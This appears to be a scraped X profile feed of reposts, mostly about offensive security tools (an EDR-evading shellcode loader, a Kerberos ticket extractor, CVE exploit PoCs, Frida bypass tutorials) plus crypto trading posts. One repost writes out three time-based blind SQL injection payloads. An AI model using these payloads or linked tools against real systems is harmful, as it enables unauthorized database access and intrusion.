h4z3dic's profile picture. Just a coder and a trader

JaeRyoung Oh

@h4z3dic

Just a coder and a trader

JaeRyoung Oh reposted

🛠️ AsmLdr Shellcode loader for Windows x64 environments. Execute encrypted payloads while minimizing detection by advanced antivirus software, endpoint detection and response (EDR) systems, sandboxes, and debuggers Try: github.com/0xNinjaCyclone…


JaeRyoung Oh reposted

BTW. We brought back anonymous access. You don't even need an acc to see Binance BTC heatmap. You welcome. 🤗

TapeSurfApp's tweet image. BTW. We brought back anonymous access.
You don't even need an acc to see Binance BTC heatmap. 

You welcome. 🤗
TapeSurfApp's tweet image. BTW. We brought back anonymous access.
You don't even need an acc to see Binance BTC heatmap. 

You welcome. 🤗

JaeRyoung Oh reposted

Smart whale 0xc2a3 closed his $BTC longs with over $5.7M in profit — then flipped short with an 18x leverage on 299.7 $BTC($32.5M). This whale has made a total profit of over $11M in the past 10 days with a 100% win rate. hyperdash.info/trader/0xc2a30…

lookonchain's tweet image. Smart whale 0xc2a3 closed his $BTC longs with over $5.7M in profit — then flipped short with an 18x leverage on 299.7 $BTC($32.5M).

This whale has made a total profit of over $11M in the past 10 days with a 100% win rate.

hyperdash.info/trader/0xc2a30…
lookonchain's tweet image. Smart whale 0xc2a3 closed his $BTC longs with over $5.7M in profit — then flipped short with an 18x leverage on 299.7 $BTC($32.5M).

This whale has made a total profit of over $11M in the past 10 days with a 100% win rate.

hyperdash.info/trader/0xc2a30…

JaeRyoung Oh reposted

My favorite SQL injection payloads: - 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' - ')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/# - 1-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)' I collected these from HackerOne reports.


JaeRyoung Oh reposted

Windows API arsenal by @0x6970 for reversers blog.fautl.com/api-list.html

struppigel's tweet image. Windows API arsenal by
@0x6970
for reversers 

blog.fautl.com/api-list.html
struppigel's tweet image. Windows API arsenal by
@0x6970
for reversers 

blog.fautl.com/api-list.html

JaeRyoung Oh reposted

Wonka - a Windows tool that extracts Kerberos tickets from the Local Security Authority (LSA) cache. github.com/Shac0x/Wonka


JaeRyoung Oh reposted

🚀 New Series: Android Reverse Engineering with Frida! 🤖 Learn to bypass security, intercept functions, and modify app behavior on-the-fly using the powerful Frida framework. 👉 guidedhacking.com/threads/frida-…

GuidedHacking's tweet image. 🚀 New Series: Android Reverse Engineering with Frida!

🤖 Learn to bypass security, intercept functions, and modify app behavior on-the-fly using the powerful Frida framework.

👉 guidedhacking.com/threads/frida-…

JaeRyoung Oh reposted

Hello everyone, I created a Burp Suite extension for IDOR and authorization testing. I know there are a few similar extensions out there, but I built this one because most of them are outdated or tend to crash Burp (especially on Windows). Here’s the link: github.com/alpernae/AuthM…

alpernae's tweet image. Hello everyone, I created a Burp Suite extension for IDOR and authorization testing. I know there are a few similar extensions out there, but I built this one because most of them are outdated or tend to crash Burp (especially on Windows). Here’s the link: github.com/alpernae/AuthM…

JaeRyoung Oh reposted

6개의 LLM모델이 코인 트레이딩 수행 중. 지금은 qwen이랑 grok이 앞서고 있네 nof1.ai

mahler83's tweet image. 6개의 LLM모델이 코인 트레이딩 수행 중. 지금은 qwen이랑 grok이 앞서고 있네 nof1.ai

Alpha Arena is LIVE 6 AI models trading $10K each, fully autonomously Real money. Real markets. Real benchmark. Who's your money on? Link below

jay_azhang's tweet image. Alpha Arena is LIVE

6 AI models trading $10K each, fully autonomously

Real money. Real markets. Real benchmark.

Who's your money on? Link below


JaeRyoung Oh reposted

I analysed a recent KernelCTF 1-Day (CVE-2025-39965) which is a UaF in Linux XFRM subsystem, including the XFRM internals, the patch-fix, vulnerability analysis, along with a trigger PoC. Enjoy! Blog: streypaws.github.io/posts/Dissecti… PoC: github.com/Shreyas-Penkar…


JaeRyoung Oh reposted

Btw we released Pwndbg 2025.10.10 recently with improved kernel debugging, mach-O+Objective-C (LLDB) support, new commands for dumping mallocng (musl) allocator state and much more! See the changelog here! github.com/pwndbg/pwndbg/…

disconnect3d_pl's tweet image. Btw we released Pwndbg 2025.10.10 recently with improved kernel debugging, mach-O+Objective-C (LLDB) support, new commands for dumping mallocng (musl) allocator state and much more!

See the changelog here!
github.com/pwndbg/pwndbg/…
disconnect3d_pl's tweet image. Btw we released Pwndbg 2025.10.10 recently with improved kernel debugging, mach-O+Objective-C (LLDB) support, new commands for dumping mallocng (musl) allocator state and much more!

See the changelog here!
github.com/pwndbg/pwndbg/…
disconnect3d_pl's tweet image. Btw we released Pwndbg 2025.10.10 recently with improved kernel debugging, mach-O+Objective-C (LLDB) support, new commands for dumping mallocng (musl) allocator state and much more!

See the changelog here!
github.com/pwndbg/pwndbg/…
disconnect3d_pl's tweet image. Btw we released Pwndbg 2025.10.10 recently with improved kernel debugging, mach-O+Objective-C (LLDB) support, new commands for dumping mallocng (musl) allocator state and much more!

See the changelog here!
github.com/pwndbg/pwndbg/…

JaeRyoung Oh reposted

Hi everyone! I just built a WaybackURLs extension that saves you a ton of time when gathering archive URLs. it supports main domains, wildcards, specific paths and sensitive file extensions. Give it a try and let me know your feedback! github.com/coffinxp/wayba…


JaeRyoung Oh reposted

A Brief Analysis of Chrome's CVE-2025-6554 in the Wild ti.qianxin.com/blog/articles/…


JaeRyoung Oh reposted

As promised, a blog post on Diffing 7-Zip for CVE-2025-11001. Enjoy :) pacbypass.github.io/2025/10/16/dif…

Wrote an exploit for CVE-2025-11001 in 7-zip Pretty cool bug, had fun diffing it. Blog post coming soon github.com/pacbypass/CVE-…



JaeRyoung Oh reposted

🦵Finding vulnerabilities in modern web apps using Claude Code and OpenAI Codex Blog: semgrep.dev/blog/2025/find… author: @clintgibler, @ermil0v & @rgaucher

mqst_'s tweet image. 🦵Finding vulnerabilities in modern web apps using Claude Code and OpenAI Codex

Blog: semgrep.dev/blog/2025/find…

author: @clintgibler, @ermil0v & @rgaucher
mqst_'s tweet image. 🦵Finding vulnerabilities in modern web apps using Claude Code and OpenAI Codex

Blog: semgrep.dev/blog/2025/find…

author: @clintgibler, @ermil0v & @rgaucher
mqst_'s tweet image. 🦵Finding vulnerabilities in modern web apps using Claude Code and OpenAI Codex

Blog: semgrep.dev/blog/2025/find…

author: @clintgibler, @ermil0v & @rgaucher

JaeRyoung Oh reposted

🛠️ PoC CVE-2025-32463 LPE→Root Local Privilege Escalation to Root via Sudo chroot in Linux github.com/kh4sh3i/CVE-20…

IntCyberDigest's tweet image. 🛠️ PoC CVE-2025-32463 LPE→Root  

Local Privilege Escalation to Root via Sudo chroot in Linux

github.com/kh4sh3i/CVE-20…

JaeRyoung Oh reposted

An experimental project exploring the use of Large Language Models (LLMs) to solve HackTheBox machines autonomously. github.com/0ca/BoxPwnr


JaeRyoung Oh reposted

I recently learned you can emulate kali thru WSL and reference your host computer via /mnt game changer kali.org/docs/wsl/wsl-p…

hackerfren's tweet image. I recently learned  you can emulate kali thru WSL and reference your host computer via /mnt 

game changer

kali.org/docs/wsl/wsl-p…

JaeRyoung Oh reposted

🔴 𝗡𝗲𝘄 𝗥𝗲𝘀𝗲𝗮𝗿𝗰𝗵: 𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗔𝗱𝗮𝗽𝘁𝗶𝘅𝗖𝟮 – 𝗧𝗿𝗮𝗰𝗶𝗻𝗴 𝗼𝘃𝗲𝗿 𝟭𝟬𝟬 𝗟𝗶𝘃𝗲 𝗖𝟮 𝗦𝗲𝗿𝘃𝗲𝗿𝘀 𝗶𝗻 𝘁𝗵𝗲 𝗪𝗶𝗹𝗱 Our team investigated AdaptixC2, an open-source command and control framework that’s being used in real attacks. Using HuntSQL™,…

Huntio's tweet image. 🔴 𝗡𝗲𝘄 𝗥𝗲𝘀𝗲𝗮𝗿𝗰𝗵:  𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗔𝗱𝗮𝗽𝘁𝗶𝘅𝗖𝟮 – 𝗧𝗿𝗮𝗰𝗶𝗻𝗴 𝗼𝘃𝗲𝗿 𝟭𝟬𝟬 𝗟𝗶𝘃𝗲 𝗖𝟮 𝗦𝗲𝗿𝘃𝗲𝗿𝘀 𝗶𝗻 𝘁𝗵𝗲 𝗪𝗶𝗹𝗱

Our team investigated AdaptixC2, an open-source command and control framework that’s being used in real attacks.

Using HuntSQL™,…
Huntio's tweet image. 🔴 𝗡𝗲𝘄 𝗥𝗲𝘀𝗲𝗮𝗿𝗰𝗵:  𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗔𝗱𝗮𝗽𝘁𝗶𝘅𝗖𝟮 – 𝗧𝗿𝗮𝗰𝗶𝗻𝗴 𝗼𝘃𝗲𝗿 𝟭𝟬𝟬 𝗟𝗶𝘃𝗲 𝗖𝟮 𝗦𝗲𝗿𝘃𝗲𝗿𝘀 𝗶𝗻 𝘁𝗵𝗲 𝗪𝗶𝗹𝗱

Our team investigated AdaptixC2, an open-source command and control framework that’s being used in real attacks.

Using HuntSQL™,…
Huntio's tweet image. 🔴 𝗡𝗲𝘄 𝗥𝗲𝘀𝗲𝗮𝗿𝗰𝗵:  𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗔𝗱𝗮𝗽𝘁𝗶𝘅𝗖𝟮 – 𝗧𝗿𝗮𝗰𝗶𝗻𝗴 𝗼𝘃𝗲𝗿 𝟭𝟬𝟬 𝗟𝗶𝘃𝗲 𝗖𝟮 𝗦𝗲𝗿𝘃𝗲𝗿𝘀 𝗶𝗻 𝘁𝗵𝗲 𝗪𝗶𝗹𝗱

Our team investigated AdaptixC2, an open-source command and control framework that’s being used in real attacks.

Using HuntSQL™,…
Huntio's tweet image. 🔴 𝗡𝗲𝘄 𝗥𝗲𝘀𝗲𝗮𝗿𝗰𝗵:  𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗔𝗱𝗮𝗽𝘁𝗶𝘅𝗖𝟮 – 𝗧𝗿𝗮𝗰𝗶𝗻𝗴 𝗼𝘃𝗲𝗿 𝟭𝟬𝟬 𝗟𝗶𝘃𝗲 𝗖𝟮 𝗦𝗲𝗿𝘃𝗲𝗿𝘀 𝗶𝗻 𝘁𝗵𝗲 𝗪𝗶𝗹𝗱

Our team investigated AdaptixC2, an open-source command and control framework that’s being used in real attacks.

Using HuntSQL™,…

Loading...

Something went wrong.


Something went wrong.